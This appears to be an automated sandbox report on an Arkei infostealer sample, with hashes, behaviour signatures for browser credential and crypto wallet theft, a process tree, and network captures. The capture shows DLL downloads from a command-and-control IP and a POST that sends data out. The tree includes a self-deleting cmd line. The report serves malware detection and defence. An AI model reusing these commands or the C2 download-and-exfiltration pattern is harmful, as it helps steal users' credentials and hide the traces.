Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24/08/2024, 11:25 UTC

General

  • Target

    311476e365e80b02b44b55ddcf5865c4.exe

  • Size

    68KB

  • MD5

    311476e365e80b02b44b55ddcf5865c4

  • SHA1

    d6fd497eb25234c77b2e8f672e292b5f9f760550

  • SHA256

    a1e0a1c53824bb1d9d0adcaa6a8e8e2f5bef673b0981807a5775a182f28fe235

  • SHA512

    70ff8f50b54df097a456689eed6c6218b2bb9d8c9e9f46c7b6e5a9dc5060eb331ba36f13cde252758b049f5b4ac498abf2d2b5c256edaf5dd7c777274e31b231

  • SSDEEP

    1536:x2vMlMpCPJeGnyJDBld71oCe10yf0cCGMyo+JM4Z8L6Q3hs1:x2vMlMp8JeoyJDBlZycdGMyoYM+/D

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Downloads MZ/PE file
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe
    "C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\311476e365e80b02b44b55ddcf5865c4.exe" & exit
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2672

Network

  • flag-gb
    GET
    http://104.194.151.11/AP.php
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /AP.php HTTP/1.1
    Host: 104.194.151.11
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:58 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Set-Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 12
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-gb
    GET
    http://104.194.151.11/sqlite3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /sqlite3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:58 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "9d9d8-6200e4e88720f"
    Accept-Ranges: bytes
    Content-Length: 645592
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/freebl3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /freebl3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "519d0-6200e4e818494"
    Accept-Ranges: bytes
    Content-Length: 334288
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/mozglue.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /mozglue.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "217d0-6200e4e840d08"
    Accept-Ranges: bytes
    Content-Length: 137168
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/msvcp140.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /msvcp140.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "6b738-6200e4e857852"
    Accept-Ranges: bytes
    Content-Length: 440120
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/nss3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /nss3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:25:59 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "1303d0-6200e4e85fd23"
    Accept-Ranges: bytes
    Content-Length: 1246160
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/softokn3.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /softokn3.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:26:00 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "235d0-6200e4e86cc2d"
    Accept-Ranges: bytes
    Content-Length: 144848
    Content-Type: application/x-msdos-program
  • flag-gb
    GET
    http://104.194.151.11/vcruntime140.dll
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    GET /vcruntime140.dll HTTP/1.1
    Host: 104.194.151.11
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:26:00 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Last-Modified: Mon, 19 Aug 2024 19:27:59 GMT
    ETag: "14748-6200e4e8856b7"
    Accept-Ranges: bytes
    Content-Length: 83784
    Content-Type: application/x-msdos-program
  • flag-gb
    POST
    http://104.194.151.11/AP.php
    311476e365e80b02b44b55ddcf5865c4.exe
    Remote address:
    104.194.151.11:80
    Request
    POST /AP.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----I5P8GD2V3W47YUS2
    Host: 104.194.151.11
    Content-Length: 46508
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=m3804cc7ff5fm6akl5jau4ljv9
    Response
    HTTP/1.1 200 OK
    Date: Sat, 24 Aug 2024 11:26:00 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 0
    Keep-Alive: timeout=5, max=92
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • 104.194.151.11:80
    http://104.194.151.11/AP.php
    http
    311476e365e80b02b44b55ddcf5865c4.exe
    113.5kB
    3.1MB
    1392
    2259

    HTTP Request

    GET http://104.194.151.11/AP.php

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/sqlite3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/freebl3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/mozglue.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/msvcp140.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/nss3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/softokn3.dll

    HTTP Response

    200

    HTTP Request

    GET http://104.194.151.11/vcruntime140.dll

    HTTP Response

    200

    HTTP Request

    POST http://104.194.151.11/AP.php

    HTTP Response

    200
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \ProgramData\mozglue.dll

    Filesize

    133KB

    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

  • \ProgramData\nss3.dll

    Filesize

    1.2MB

    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

  • \ProgramData\sqlite3.dll

    Filesize

    630KB

    MD5

    e477a96c8f2b18d6b5c27bde49c990bf

    SHA1

    e980c9bf41330d1e5bd04556db4646a0210f7409

    SHA256

    16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

    SHA512

    335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

  • memory/836-0-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/836-1-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/836-53-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.